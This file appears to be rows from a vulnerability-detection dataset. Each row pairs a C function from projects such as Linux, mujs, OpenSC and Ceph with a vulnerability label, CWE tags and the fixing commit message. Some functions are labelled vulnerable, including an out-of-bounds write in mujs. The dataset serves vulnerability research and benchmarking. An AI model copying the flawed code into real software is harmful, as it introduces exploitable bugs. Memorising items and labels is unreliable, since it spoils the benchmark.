func
stringlengths 0
484k
| target
int64 0
1
| cwe
listlengths 0
4
| project
stringclasses 799
values | commit_id
stringlengths 40
40
| hash
float64 1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
| size
int64 1
24k
| message
stringlengths 0
13.3k
|
---|---|---|---|---|---|---|---|
static inline unsigned long group_faults_cpu(struct numa_group *group, int nid)
{
return group->faults_cpu[task_faults_idx(NUMA_MEM, nid, 0)] +
group->faults_cpu[task_faults_idx(NUMA_MEM, nid, 1)];
}
| 0 |
[
"CWE-400",
"CWE-703",
"CWE-835"
] |
linux
|
c40f7d74c741a907cfaeb73a7697081881c497d0
| 14,342,586,438,121,807,000,000,000,000,000,000,000 | 5 |
sched/fair: Fix infinite loop in update_blocked_averages() by reverting a9e7f6544b9c
Zhipeng Xie, Xie XiuQi and Sargun Dhillon reported lockups in the
scheduler under high loads, starting at around the v4.18 time frame,
and Zhipeng Xie tracked it down to bugs in the rq->leaf_cfs_rq_list
manipulation.
Do a (manual) revert of:
a9e7f6544b9c ("sched/fair: Fix O(nr_cgroups) in load balance path")
It turns out that the list_del_leaf_cfs_rq() introduced by this commit
is a surprising property that was not considered in followup commits
such as:
9c2791f936ef ("sched/fair: Fix hierarchical order in rq->leaf_cfs_rq_list")
As Vincent Guittot explains:
"I think that there is a bigger problem with commit a9e7f6544b9c and
cfs_rq throttling:
Let take the example of the following topology TG2 --> TG1 --> root:
1) The 1st time a task is enqueued, we will add TG2 cfs_rq then TG1
cfs_rq to leaf_cfs_rq_list and we are sure to do the whole branch in
one path because it has never been used and can't be throttled so
tmp_alone_branch will point to leaf_cfs_rq_list at the end.
2) Then TG1 is throttled
3) and we add TG3 as a new child of TG1.
4) The 1st enqueue of a task on TG3 will add TG3 cfs_rq just before TG1
cfs_rq and tmp_alone_branch will stay on rq->leaf_cfs_rq_list.
With commit a9e7f6544b9c, we can del a cfs_rq from rq->leaf_cfs_rq_list.
So if the load of TG1 cfs_rq becomes NULL before step 2) above, TG1
cfs_rq is removed from the list.
Then at step 4), TG3 cfs_rq is added at the beginning of rq->leaf_cfs_rq_list
but tmp_alone_branch still points to TG3 cfs_rq because its throttled
parent can't be enqueued when the lock is released.
tmp_alone_branch doesn't point to rq->leaf_cfs_rq_list whereas it should.
So if TG3 cfs_rq is removed or destroyed before tmp_alone_branch
points on another TG cfs_rq, the next TG cfs_rq that will be added,
will be linked outside rq->leaf_cfs_rq_list - which is bad.
In addition, we can break the ordering of the cfs_rq in
rq->leaf_cfs_rq_list but this ordering is used to update and
propagate the update from leaf down to root."
Instead of trying to work through all these cases and trying to reproduce
the very high loads that produced the lockup to begin with, simplify
the code temporarily by reverting a9e7f6544b9c - which change was clearly
not thought through completely.
This (hopefully) gives us a kernel that doesn't lock up so people
can continue to enjoy their holidays without worrying about regressions. ;-)
[ mingo: Wrote changelog, fixed weird spelling in code comment while at it. ]
Analyzed-by: Xie XiuQi <[email protected]>
Analyzed-by: Vincent Guittot <[email protected]>
Reported-by: Zhipeng Xie <[email protected]>
Reported-by: Sargun Dhillon <[email protected]>
Reported-by: Xie XiuQi <[email protected]>
Tested-by: Zhipeng Xie <[email protected]>
Tested-by: Sargun Dhillon <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
Acked-by: Vincent Guittot <[email protected]>
Cc: <[email protected]> # v4.13+
Cc: Bin Li <[email protected]>
Cc: Mike Galbraith <[email protected]>
Cc: Peter Zijlstra <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Fixes: a9e7f6544b9c ("sched/fair: Fix O(nr_cgroups) in load balance path")
Link: http://lkml.kernel.org/r/[email protected]
Signed-off-by: Ingo Molnar <[email protected]>
|
asmlinkage void do_notify_resume(struct pt_regs *regs, unsigned long thread_info_flags)
{
if (thread_info_flags & _TIF_SIGPENDING)
do_signal(regs, 0);
if (thread_info_flags & _TIF_NOTIFY_RESUME) {
clear_thread_flag(TIF_NOTIFY_RESUME);
tracehook_notify_resume(regs);
if (current->replacement_session_keyring)
key_replace_session_keyring();
}
}
| 0 |
[] |
linux-2.6
|
ee18d64c1f632043a02e6f5ba5e045bb26a5465f
| 82,106,669,616,644,270,000,000,000,000,000,000,000 | 12 |
KEYS: Add a keyctl to install a process's session keyring on its parent [try #6]
Add a keyctl to install a process's session keyring onto its parent. This
replaces the parent's session keyring. Because the COW credential code does
not permit one process to change another process's credentials directly, the
change is deferred until userspace next starts executing again. Normally this
will be after a wait*() syscall.
To support this, three new security hooks have been provided:
cred_alloc_blank() to allocate unset security creds, cred_transfer() to fill in
the blank security creds and key_session_to_parent() - which asks the LSM if
the process may replace its parent's session keyring.
The replacement may only happen if the process has the same ownership details
as its parent, and the process has LINK permission on the session keyring, and
the session keyring is owned by the process, and the LSM permits it.
Note that this requires alteration to each architecture's notify_resume path.
This has been done for all arches barring blackfin, m68k* and xtensa, all of
which need assembly alteration to support TIF_NOTIFY_RESUME. This allows the
replacement to be performed at the point the parent process resumes userspace
execution.
This allows the userspace AFS pioctl emulation to fully emulate newpag() and
the VIOCSETTOK and VIOCSETTOK2 pioctls, all of which require the ability to
alter the parent process's PAG membership. However, since kAFS doesn't use
PAGs per se, but rather dumps the keys into the session keyring, the session
keyring of the parent must be replaced if, for example, VIOCSETTOK is passed
the newpag flag.
This can be tested with the following program:
#include <stdio.h>
#include <stdlib.h>
#include <keyutils.h>
#define KEYCTL_SESSION_TO_PARENT 18
#define OSERROR(X, S) do { if ((long)(X) == -1) { perror(S); exit(1); } } while(0)
int main(int argc, char **argv)
{
key_serial_t keyring, key;
long ret;
keyring = keyctl_join_session_keyring(argv[1]);
OSERROR(keyring, "keyctl_join_session_keyring");
key = add_key("user", "a", "b", 1, keyring);
OSERROR(key, "add_key");
ret = keyctl(KEYCTL_SESSION_TO_PARENT);
OSERROR(ret, "KEYCTL_SESSION_TO_PARENT");
return 0;
}
Compiled and linked with -lkeyutils, you should see something like:
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: _ses
355907932 --alswrv 4043 -1 \_ keyring: _uid.4043
[dhowells@andromeda ~]$ /tmp/newpag
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: _ses
1055658746 --alswrv 4043 4043 \_ user: a
[dhowells@andromeda ~]$ /tmp/newpag hello
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: hello
340417692 --alswrv 4043 4043 \_ user: a
Where the test program creates a new session keyring, sticks a user key named
'a' into it and then installs it on its parent.
Signed-off-by: David Howells <[email protected]>
Signed-off-by: James Morris <[email protected]>
|
GF_Err saiz_Write(GF_Box *s, GF_BitStream *bs)
{
GF_Err e;
GF_SampleAuxiliaryInfoSizeBox*ptr = (GF_SampleAuxiliaryInfoSizeBox*) s;
if (!s) return GF_BAD_PARAM;
e = gf_isom_full_box_write(s, bs);
if (e) return e;
if (ptr->flags & 1) {
gf_bs_write_u32(bs, ptr->aux_info_type);
gf_bs_write_u32(bs, ptr->aux_info_type_parameter);
}
gf_bs_write_u8(bs, ptr->default_sample_info_size);
gf_bs_write_u32(bs, ptr->sample_count);
if (!ptr->default_sample_info_size) {
gf_bs_write_data(bs, (char *) ptr->sample_info_size, ptr->sample_count);
}
return GF_OK;
| 0 |
[
"CWE-400",
"CWE-401"
] |
gpac
|
d2371b4b204f0a3c0af51ad4e9b491144dd1225c
| 218,673,900,211,110,350,000,000,000,000,000,000,000 | 19 |
prevent dref memleak on invalid input (#1183)
|
static void labeljumps(JF, js_JumpList *jump, int baddr, int caddr)
{
while (jump) {
if (jump->type == STM_BREAK)
labelto(J, F, jump->inst, baddr);
if (jump->type == STM_CONTINUE)
labelto(J, F, jump->inst, caddr);
jump = jump->next;
}
}
| 1 |
[
"CWE-703",
"CWE-787"
] |
mujs
|
df8559e7bdbc6065276e786217eeee70f28fce66
| 35,025,489,215,643,323,000,000,000,000,000,000,000 | 10 |
Bug 704749: Clear jump list after patching jump addresses.
Since we can emit a statement multiple times when compiling try/finally
we have to use a new patch list for each instance.
|
static int __init calipso_cache_init(void)
{
u32 iter;
calipso_cache = kcalloc(CALIPSO_CACHE_BUCKETS,
sizeof(struct calipso_map_cache_bkt),
GFP_KERNEL);
if (!calipso_cache)
return -ENOMEM;
for (iter = 0; iter < CALIPSO_CACHE_BUCKETS; iter++) {
spin_lock_init(&calipso_cache[iter].lock);
calipso_cache[iter].size = 0;
INIT_LIST_HEAD(&calipso_cache[iter].list);
}
return 0;
}
| 0 |
[
"CWE-416"
] |
linux
|
ad5d07f4a9cd671233ae20983848874731102c08
| 171,955,502,553,684,130,000,000,000,000,000,000,000 | 18 |
cipso,calipso: resolve a number of problems with the DOI refcounts
The current CIPSO and CALIPSO refcounting scheme for the DOI
definitions is a bit flawed in that we:
1. Don't correctly match gets/puts in netlbl_cipsov4_list().
2. Decrement the refcount on each attempt to remove the DOI from the
DOI list, only removing it from the list once the refcount drops
to zero.
This patch fixes these problems by adding the missing "puts" to
netlbl_cipsov4_list() and introduces a more conventional, i.e.
not-buggy, refcounting mechanism to the DOI definitions. Upon the
addition of a DOI to the DOI list, it is initialized with a refcount
of one, removing a DOI from the list removes it from the list and
drops the refcount by one; "gets" and "puts" behave as expected with
respect to refcounts, increasing and decreasing the DOI's refcount by
one.
Fixes: b1edeb102397 ("netlabel: Replace protocol/NetLabel linking with refrerence counts")
Fixes: d7cce01504a0 ("netlabel: Add support for removing a CALIPSO DOI.")
Reported-by: [email protected]
Signed-off-by: Paul Moore <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
int sc_mem_reverse(unsigned char *buf, size_t len)
{
unsigned char ch;
size_t ii;
if (!buf || !len)
return SC_ERROR_INVALID_ARGUMENTS;
for (ii = 0; ii < len / 2; ii++) {
ch = *(buf + ii);
*(buf + ii) = *(buf + len - 1 - ii);
*(buf + len - 1 - ii) = ch;
}
return SC_SUCCESS;
}
| 0 |
[
"CWE-415",
"CWE-119"
] |
OpenSC
|
360e95d45ac4123255a4c796db96337f332160ad
| 132,055,422,843,079,060,000,000,000,000,000,000,000 | 16 |
fixed out of bounds writes
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting the problems.
|
static struct udf_bitmap *udf_sb_alloc_bitmap(struct super_block *sb, u32 index)
{
struct udf_bitmap *bitmap;
int nr_groups;
int size;
nr_groups = udf_compute_nr_groups(sb, index);
size = sizeof(struct udf_bitmap) +
(sizeof(struct buffer_head *) * nr_groups);
if (size <= PAGE_SIZE)
bitmap = kzalloc(size, GFP_KERNEL);
else
bitmap = vzalloc(size); /* TODO: get rid of vzalloc */
if (bitmap == NULL)
return NULL;
bitmap->s_block_bitmap = (struct buffer_head **)(bitmap + 1);
bitmap->s_nr_groups = nr_groups;
return bitmap;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
linux
|
1df2ae31c724e57be9d7ac00d78db8a5dabdd050
| 168,581,320,854,450,590,000,000,000,000,000,000,000 | 22 |
udf: Fortify loading of sparing table
Add sanity checks when loading sparing table from disk to avoid accessing
unallocated memory or writing to it.
Signed-off-by: Jan Kara <[email protected]>
|
//! Load image using GraphicsMagick's external tool 'gm' \newinstance.
static CImg<T> get_load_graphicsmagick_external(const char *const filename) {
return CImg<T>().load_graphicsmagick_external(filename);
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 17,650,912,859,412,271,000,000,000,000,000,000,000 | 3 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
Field_decimal::reset(void)
{
Field_decimal::store(STRING_WITH_LEN("0"),&my_charset_bin);
return 0;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 26,987,630,508,805,580,000,000,000,000,000,000,000 | 5 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
void LibRaw::phase_one_subtract_black(ushort *src, ushort *dest)
{
// ushort *src = (ushort*)imgdata.rawdata.raw_alloc;
if(O.user_black<0 && O.user_cblack[0] <= -1000000 && O.user_cblack[1] <= -1000000 && O.user_cblack[2] <= -1000000 && O.user_cblack[3] <= -1000000)
{
for(int row = 0; row < S.raw_height; row++)
{
ushort bl = imgdata.color.phase_one_data.t_black - imgdata.rawdata.ph1_black[row][0];
for(int col=0; col < imgdata.color.phase_one_data.split_col && col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
dest[idx] = val>bl?val-bl:0;
}
bl = imgdata.color.phase_one_data.t_black - imgdata.rawdata.ph1_black[row][1];
for(int col=imgdata.color.phase_one_data.split_col; col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
dest[idx] = val>bl?val-bl:0;
}
}
}
else // black set by user interaction
{
// Black level in cblack!
for(int row = 0; row < S.raw_height; row++)
{
unsigned short cblk[16];
for(int cc=0; cc<16;cc++)
cblk[cc]=C.cblack[fcol(row,cc)];
for(int col = 0; col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
ushort bl = cblk[col&0xf];
dest[idx] = val>bl?val-bl:0;
}
}
}
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
LibRaw
|
2f912f5b33582961b1cdbd9fd828589f8b78f21d
| 137,228,394,083,199,800,000,000,000,000,000,000,000 | 41 |
fixed wrong data_maximum calcluation; prevent out-of-buffer in exp_bef
|
void btrfs_inherit_iflags(struct inode *inode, struct inode *dir)
{
unsigned int flags;
if (!dir)
return;
flags = BTRFS_I(dir)->flags;
if (flags & BTRFS_INODE_NOCOMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_COMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & BTRFS_INODE_COMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_NOCOMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_COMPRESS;
}
if (flags & BTRFS_INODE_NODATACOW) {
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATACOW;
if (S_ISREG(inode->i_mode))
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATASUM;
}
btrfs_update_iflags(inode);
}
| 0 |
[
"CWE-200"
] |
linux
|
8039d87d9e473aeb740d4fdbd59b9d2f89b2ced9
| 49,507,311,139,274,540,000,000,000,000,000,000,000 | 25 |
Btrfs: fix file corruption and data loss after cloning inline extents
Currently the clone ioctl allows to clone an inline extent from one file
to another that already has other (non-inlined) extents. This is a problem
because btrfs is not designed to deal with files having inline and regular
extents, if a file has an inline extent then it must be the only extent
in the file and must start at file offset 0. Having a file with an inline
extent followed by regular extents results in EIO errors when doing reads
or writes against the first 4K of the file.
Also, the clone ioctl allows one to lose data if the source file consists
of a single inline extent, with a size of N bytes, and the destination
file consists of a single inline extent with a size of M bytes, where we
have M > N. In this case the clone operation removes the inline extent
from the destination file and then copies the inline extent from the
source file into the destination file - we lose the M - N bytes from the
destination file, a read operation will get the value 0x00 for any bytes
in the the range [N, M] (the destination inode's i_size remained as M,
that's why we can read past N bytes).
So fix this by not allowing such destructive operations to happen and
return errno EOPNOTSUPP to user space.
Currently the fstest btrfs/035 tests the data loss case but it totally
ignores this - i.e. expects the operation to succeed and does not check
the we got data loss.
The following test case for fstests exercises all these cases that result
in file corruption and data loss:
seq=`basename $0`
seqres=$RESULT_DIR/$seq
echo "QA output created by $seq"
tmp=/tmp/$$
status=1 # failure is the default!
trap "_cleanup; exit \$status" 0 1 2 3 15
_cleanup()
{
rm -f $tmp.*
}
# get standard environment, filters and checks
. ./common/rc
. ./common/filter
# real QA test starts here
_need_to_be_root
_supported_fs btrfs
_supported_os Linux
_require_scratch
_require_cloner
_require_btrfs_fs_feature "no_holes"
_require_btrfs_mkfs_feature "no-holes"
rm -f $seqres.full
test_cloning_inline_extents()
{
local mkfs_opts=$1
local mount_opts=$2
_scratch_mkfs $mkfs_opts >>$seqres.full 2>&1
_scratch_mount $mount_opts
# File bar, the source for all the following clone operations, consists
# of a single inline extent (50 bytes).
$XFS_IO_PROG -f -c "pwrite -S 0xbb 0 50" $SCRATCH_MNT/bar \
| _filter_xfs_io
# Test cloning into a file with an extent (non-inlined) where the
# destination offset overlaps that extent. It should not be possible to
# clone the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "pwrite -S 0xaa 0K 16K" $SCRATCH_MNT/foo \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "File foo data after clone operation:"
# All bytes should have the value 0xaa (clone operation failed and did
# not modify our file).
od -t x1 $SCRATCH_MNT/foo
$XFS_IO_PROG -c "pwrite -S 0xcc 0 100" $SCRATCH_MNT/foo | _filter_xfs_io
# Test cloning the inline extent against a file which has a hole in its
# first 4K followed by a non-inlined extent. It should not be possible
# as well to clone the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "pwrite -S 0xdd 4K 12K" $SCRATCH_MNT/foo2 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo2
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "File foo2 data after clone operation:"
# All bytes should have the value 0x00 (clone operation failed and did
# not modify our file).
od -t x1 $SCRATCH_MNT/foo2
$XFS_IO_PROG -c "pwrite -S 0xee 0 90" $SCRATCH_MNT/foo2 | _filter_xfs_io
# Test cloning the inline extent against a file which has a size of zero
# but has a prealloc extent. It should not be possible as well to clone
# the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "falloc -k 0 1M" $SCRATCH_MNT/foo3 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo3
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "First 50 bytes of foo3 after clone operation:"
# Should not be able to read any bytes, file has 0 bytes i_size (the
# clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo3
$XFS_IO_PROG -c "pwrite -S 0xff 0 90" $SCRATCH_MNT/foo3 | _filter_xfs_io
# Test cloning the inline extent against a file which consists of a
# single inline extent that has a size not greater than the size of
# bar's inline extent (40 < 50).
# It should be possible to do the extent cloning from bar to this file.
$XFS_IO_PROG -f -c "pwrite -S 0x01 0 40" $SCRATCH_MNT/foo4 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo4
# Doing IO against any range in the first 4K of the file should work.
echo "File foo4 data after clone operation:"
# Must match file bar's content.
od -t x1 $SCRATCH_MNT/foo4
$XFS_IO_PROG -c "pwrite -S 0x02 0 90" $SCRATCH_MNT/foo4 | _filter_xfs_io
# Test cloning the inline extent against a file which consists of a
# single inline extent that has a size greater than the size of bar's
# inline extent (60 > 50).
# It should not be possible to clone the inline extent from file bar
# into this file.
$XFS_IO_PROG -f -c "pwrite -S 0x03 0 60" $SCRATCH_MNT/foo5 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo5
# Reading the file should not fail.
echo "File foo5 data after clone operation:"
# Must have a size of 60 bytes, with all bytes having a value of 0x03
# (the clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo5
# Test cloning the inline extent against a file which has no extents but
# has a size greater than bar's inline extent (16K > 50).
# It should not be possible to clone the inline extent from file bar
# into this file.
$XFS_IO_PROG -f -c "truncate 16K" $SCRATCH_MNT/foo6 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo6
# Reading the file should not fail.
echo "File foo6 data after clone operation:"
# Must have a size of 16K, with all bytes having a value of 0x00 (the
# clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo6
# Test cloning the inline extent against a file which has no extents but
# has a size not greater than bar's inline extent (30 < 50).
# It should be possible to clone the inline extent from file bar into
# this file.
$XFS_IO_PROG -f -c "truncate 30" $SCRATCH_MNT/foo7 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo7
# Reading the file should not fail.
echo "File foo7 data after clone operation:"
# Must have a size of 50 bytes, with all bytes having a value of 0xbb.
od -t x1 $SCRATCH_MNT/foo7
# Test cloning the inline extent against a file which has a size not
# greater than the size of bar's inline extent (20 < 50) but has
# a prealloc extent that goes beyond the file's size. It should not be
# possible to clone the inline extent from bar into this file.
$XFS_IO_PROG -f -c "falloc -k 0 1M" \
-c "pwrite -S 0x88 0 20" \
$SCRATCH_MNT/foo8 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo8
echo "File foo8 data after clone operation:"
# Must have a size of 20 bytes, with all bytes having a value of 0x88
# (the clone operation did not modify our file).
od -t x1 $SCRATCH_MNT/foo8
_scratch_unmount
}
echo -e "\nTesting without compression and without the no-holes feature...\n"
test_cloning_inline_extents
echo -e "\nTesting with compression and without the no-holes feature...\n"
test_cloning_inline_extents "" "-o compress"
echo -e "\nTesting without compression and with the no-holes feature...\n"
test_cloning_inline_extents "-O no-holes" ""
echo -e "\nTesting with compression and with the no-holes feature...\n"
test_cloning_inline_extents "-O no-holes" "-o compress"
status=0
exit
Cc: [email protected]
Signed-off-by: Filipe Manana <[email protected]>
|
TEST_P(MessengerTest, StatefulTest) {
Message *m;
FakeDispatcher cli_dispatcher(false), srv_dispatcher(true);
entity_addr_t bind_addr;
bind_addr.parse("127.0.0.1");
Messenger::Policy p = Messenger::Policy::stateful_server(0);
server_msgr->set_policy(entity_name_t::TYPE_CLIENT, p);
p = Messenger::Policy::lossless_client(0);
client_msgr->set_policy(entity_name_t::TYPE_OSD, p);
server_msgr->bind(bind_addr);
server_msgr->add_dispatcher_head(&srv_dispatcher);
server_msgr->start();
client_msgr->add_dispatcher_head(&cli_dispatcher);
client_msgr->start();
// 1. test for server standby
ConnectionRef conn = client_msgr->get_connection(server_msgr->get_myinst());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
ASSERT_TRUE(static_cast<Session*>(conn->get_priv())->get_count() == 1);
conn->mark_down();
ASSERT_FALSE(conn->is_connected());
ConnectionRef server_conn = server_msgr->get_connection(client_msgr->get_myinst());
// don't lose state
ASSERT_TRUE(static_cast<Session*>(server_conn->get_priv())->get_count() == 1);
srv_dispatcher.got_new = false;
conn = client_msgr->get_connection(server_msgr->get_myinst());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
ASSERT_TRUE(static_cast<Session*>(conn->get_priv())->get_count() == 1);
server_conn = server_msgr->get_connection(client_msgr->get_myinst());
{
Mutex::Locker l(srv_dispatcher.lock);
while (!srv_dispatcher.got_remote_reset)
srv_dispatcher.cond.Wait(srv_dispatcher.lock);
}
// 2. test for client reconnect
ASSERT_FALSE(cli_dispatcher.got_remote_reset);
cli_dispatcher.got_connect = false;
cli_dispatcher.got_new = false;
cli_dispatcher.got_remote_reset = false;
server_conn->mark_down();
ASSERT_FALSE(server_conn->is_connected());
// ensure client detect server socket closed
{
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_remote_reset)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_remote_reset = false;
}
{
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_connect)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_connect = false;
}
CHECK_AND_WAIT_TRUE(conn->is_connected());
ASSERT_TRUE(conn->is_connected());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
ASSERT_TRUE(conn->is_connected());
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
// resetcheck happen
ASSERT_EQ(1U, static_cast<Session*>(conn->get_priv())->get_count());
server_conn = server_msgr->get_connection(client_msgr->get_myinst());
ASSERT_EQ(1U, static_cast<Session*>(server_conn->get_priv())->get_count());
cli_dispatcher.got_remote_reset = false;
server_msgr->shutdown();
client_msgr->shutdown();
server_msgr->wait();
client_msgr->wait();
}
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 20,063,317,078,663,555,000,000,000,000,000,000,000 | 94 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
static int cpu_clock_sample_group_locked(unsigned int clock_idx,
struct task_struct *p,
union cpu_time_count *cpu)
{
struct task_struct *t = p;
switch (clock_idx) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
cpu->cpu = cputime_add(p->signal->utime, p->signal->stime);
do {
cpu->cpu = cputime_add(cpu->cpu, prof_ticks(t));
t = next_thread(t);
} while (t != p);
break;
case CPUCLOCK_VIRT:
cpu->cpu = p->signal->utime;
do {
cpu->cpu = cputime_add(cpu->cpu, virt_ticks(t));
t = next_thread(t);
} while (t != p);
break;
case CPUCLOCK_SCHED:
cpu->sched = p->signal->sum_sched_runtime;
/* Add in each other live thread. */
while ((t = next_thread(t)) != p) {
cpu->sched += t->se.sum_exec_runtime;
}
cpu->sched += sched_ns(p);
break;
}
return 0;
}
| 0 |
[
"CWE-189"
] |
linux
|
f8bd2258e2d520dff28c855658bd24bdafb5102d
| 315,888,551,872,965,960,000,000,000,000,000,000,000 | 33 |
remove div_long_long_rem
x86 is the only arch right now, which provides an optimized for
div_long_long_rem and it has the downside that one has to be very careful that
the divide doesn't overflow.
The API is a little akward, as the arguments for the unsigned divide are
signed. The signed version also doesn't handle a negative divisor and
produces worse code on 64bit archs.
There is little incentive to keep this API alive, so this converts the few
users to the new API.
Signed-off-by: Roman Zippel <[email protected]>
Cc: Ralf Baechle <[email protected]>
Cc: Ingo Molnar <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Cc: john stultz <[email protected]>
Cc: Christoph Lameter <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
RegexMatchExpression::RegexMatchExpression(StringData path, const BSONElement& e)
: LeafMatchExpression(REGEX, path),
_regex(e.regex()),
_flags(e.regexFlags()),
_re(new pcrecpp::RE(_regex.c_str(), regex_util::flagsToPcreOptions(_flags, true))) {
uassert(ErrorCodes::BadValue, "regex not a regex", e.type() == RegEx);
_init();
}
| 0 |
[
"CWE-190"
] |
mongo
|
21d8699ed6c517b45e1613e20231cd8eba894985
| 214,354,002,941,884,180,000,000,000,000,000,000,000 | 8 |
SERVER-43699 $mod should not overflow for large negative values
|
static void rtrs_clt_init_req(struct rtrs_clt_io_req *req,
struct rtrs_clt_path *clt_path,
void (*conf)(void *priv, int errno),
struct rtrs_permit *permit, void *priv,
const struct kvec *vec, size_t usr_len,
struct scatterlist *sg, size_t sg_cnt,
size_t data_len, int dir)
{
struct iov_iter iter;
size_t len;
req->permit = permit;
req->in_use = true;
req->usr_len = usr_len;
req->data_len = data_len;
req->sglist = sg;
req->sg_cnt = sg_cnt;
req->priv = priv;
req->dir = dir;
req->con = rtrs_permit_to_clt_con(clt_path, permit);
req->conf = conf;
req->need_inv = false;
req->need_inv_comp = false;
req->inv_errno = 0;
refcount_set(&req->ref, 1);
req->mp_policy = clt_path->clt->mp_policy;
iov_iter_kvec(&iter, READ, vec, 1, usr_len);
